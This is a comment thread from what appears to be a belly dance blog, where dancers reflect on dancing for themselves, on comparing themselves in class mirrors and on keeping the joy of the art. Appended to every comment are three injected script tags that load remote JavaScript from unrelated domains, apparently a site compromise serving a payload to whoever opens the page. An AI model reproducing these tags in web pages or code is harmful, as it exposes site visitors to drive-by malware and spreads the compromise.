I can happily say I am dancing for myself. To me, the dance is not really about someone else. It's about who YOU are. Your uniqueness, after all we are all special. The dance is about showing your individuality. Imagine, if every dancer danced, looked, and acted the same way. How boring that would be. So the more we go deep into ourselves and truly ask why am I dancing the more answers we will find and the more beautiful we will become.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

I guess because you narrated part of my story there... I'm going to tell you who I've danced for... I've danced for anyone who wants to see me dancing, I danced for myself, for the DJ, for the f... Owner of the venue, for the steaks and Sangrias, for friends, for enemies, for the watchful eye, for the careless eye, for corrupted presidents, for Spiritual Leaders, for one person in the audience, for 2000 people in the audience, for lovers, and definitely for the mirrors, and I will never regret any of those moments because I found a place for each one of them in my heart, I'm a Dancer and Dancers dance... It doesn't matter for who. Aasal El Helwa<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

I am a very new belly dancer, but a professional opera singer and I find that my colleagues and I are asking ourselves the very same questions. Periodically every artist needs to stop and take a look at what drives us to do continue to make art and how we can be fulfilled by the experience. Thanks for sharing your thoughts!
PS: The chiffon costume at the beginning of the article is gorgeous!<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

Yes, it does make me look even more less than if I buried myself with the new-bee's but I don't care about what others think. I am too old and fat to care. Behind and/or mixed in with the better dancers gives me someone to follow. Also if I keep my eyes off of the mirror I can FEEL like I am as good. That way I fall much easier into "dance space".

Dance for me to project who I am, and what I feel. In my routines, costumes and music. It is why I do not label myself just Tribal or fusion. As I am into many forms/styles and music genres. And yes all dance is spiritual. And a celebration of life!
I have learned and grown into many things since 1985 . And am happy with who and what I am. I remain myself.
I love what you wrote it all makes perfect sense.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

It is designed to bring to our attention some of the feelings and attitudes that sabotage our growth as dancers and women. Often, we are not even aware of our own negativity and our ego needs a little shake to wake up (at least mine does!), especially because most dancers were taught to compare themselves to others, to be competitive in a bad way, etc.
My hope is that as each dancer finishes reading it, she won't have any negative feelings but a satisfied smile showing that she is well above such petty issues... showing that whenever she is in class, performance or any other situation, she is present in her body and mind, taking in the knowledge, sharing her art, communing... not comparing, criticizing or blaming.
I am however in the process of writing more positive pieces... stay tuned!<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

Sure I've danced behind the best person in the class, hung out in the mirror, and wished I could even remotely look as good as my teacher(s). But ultimately I dance because my spirit calls me!
Blanca is right, sometimes we get so caught up that we lose the joy. Thank you for reminding us that we need to bring our positive energies into our dance experiences.
Peace,
Sahar<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |
